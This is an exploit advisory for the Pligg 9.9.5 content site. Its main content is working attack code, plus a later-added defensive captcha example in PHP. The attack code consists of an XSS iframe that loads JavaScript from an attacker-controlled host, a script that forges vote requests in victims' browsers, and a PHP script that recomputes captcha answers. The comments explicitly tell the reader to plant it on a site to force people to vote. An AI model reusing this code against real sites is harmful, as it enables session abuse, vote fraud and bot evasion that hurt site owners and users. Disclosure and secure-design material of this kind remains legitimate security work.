Pligg 9.9.5 XSRF Protection Bypass and Captcha Bypass
Source: vfocus.net  Author: vfocus  Published: 2009-02-02
Written By Michael Brooks
Special thanks to str0ke!

Pligg - XSRF Protection Bypass and Captcha Bypass
affects 9.9.5

XSRF Protection Bypass
<html>
<!--
Remove this iframe from this file and place it on a site that you want
to force people to vote for.
Change these pligg_story_to_vote_for, target_pligg_site and site_you_control .
-->
<iframe src='http://target_pligg_site/index.php?category="><script
src=http://site_you_control/pligg_auto_voter.html
type=text/javascript></script>' width="0%" height="0%"></iframe>
</html>

	var pligg_story_to_vote_for="/story.php?title=pligg_xss";
	
	function r(){
		var Z=false;
		if(window.XMLHttpRequest){
			try{
				Z=new XMLHttpRequest()
			}catch(e){Z=false}
		}else if(window.ActiveXObject){
			try{
				Z=new ActiveXObject('Msxml2.XMLHTTP')
			}catch(e){
				try{
					Z=new ActiveXObject('Microsoft.XMLHTTP')
				}catch(e){Z=false}
			}
		}
		return Z
	}
	var x=r();
	x.open("GET",pligg_story_to_vote_for,true);
	x.onreadystatechange = function() {
		if (x.readyState == 4) {
			var v=x.responseText.split("javascript:vote(");
			v=v[1].split(")");
			v=v[0].split(",");
			var p="id="+v[1]+"&user="+v[0]+"&md5="+v[3].substring(1,33)+"&value="+v[4];
			var y=r();
			y.open("POST","/vote.php",true);
			y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
			y.setRequestHeader("Content-length", p.length);
			y.setRequestHeader("Connection", "close");
			y.send(p);
		}
	}
	x.send('');

Captcha bypass.
The link to the captcha image will look something like this:

http://127.0.0.1/Pligg_Beta_9.9.0/ts_image.php?ts_random=54771854

To obtain the clear text, send that ts_random value to the
captcha_bypass.php with the same web browser:


http://127.0.0.1/captcha_bypass.php?ts_random=54771854

captcha_bypass.php:

<?php

$sitekey=82397834;

$ts_random=$_REQUEST['ts_random'];

$datekey = date("F j");

$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey .
$ts_random . $datekey));

print substr($rcode, 2, 6);

?>

# [2009-01-29]
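
The captcha bypass works because every input to the value computed in captcha_bypass.php is either sent by the client or hard-coded in the script, so the answer can be recomputed outside the server. The following is an added example, not part of the original advisory and not Pligg code, of a challenge whose answer exists only in server-side session state; the function names, the session layout and the two limits are assumptions.

```php
<?php
// Added example, not Pligg code: all names below are hypothetical.

const CAPTCHA_TTL = 300;       // seconds a challenge stays valid (assumed policy)
const CAPTCHA_MAX_TRIES = 3;   // wrong answers allowed per challenge (assumed policy)

// Create a challenge. The answer comes from the CSPRNG and is kept only in
// server-side session state; nothing sent to the client can reproduce it.
function captcha_issue(array &$session): string
{
    $id = bin2hex(random_bytes(16));   // opaque id to place in the image URL
    $code = str_pad((string) random_int(0, 999999), 6, '0', STR_PAD_LEFT);
    $session['captcha'] = [
        'id' => $id,
        'code' => $code,
        'expires' => time() + CAPTCHA_TTL,
        'tries' => 0,
    ];
    return $id;   // the image script renders $session['captcha']['code'] for this id
}

// Check an answer. The challenge is discarded on success, on expiry,
// on an id mismatch and after too many wrong answers.
function captcha_verify(array &$session, string $id, string $answer): bool
{
    $c = $session['captcha'] ?? null;
    if ($c === null || !hash_equals($c['id'], $id) || time() > $c['expires']) {
        unset($session['captcha']);
        return false;
    }
    if (hash_equals($c['code'], $answer)) {
        unset($session['captcha']);   // single use: a solved challenge cannot be replayed
        return true;
    }
    if (++$session['captcha']['tries'] >= CAPTCHA_MAX_TRIES) {
        unset($session['captcha']);   // force a fresh challenge instead of allowing guessing
    }
    return false;
}

// Constructed demonstration, with a plain array standing in for $_SESSION.
$session = [];
$id = captcha_issue($session);
$answer = $session['captcha']['code'];               // what a human would read from the image
var_dump(captcha_verify($session, $id, 'xxxxxx'));   // wrong answer
var_dump(captcha_verify($session, $id, $answer));    // correct answer, first use
var_dump(captcha_verify($session, $id, $answer));    // same answer submitted again
```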

 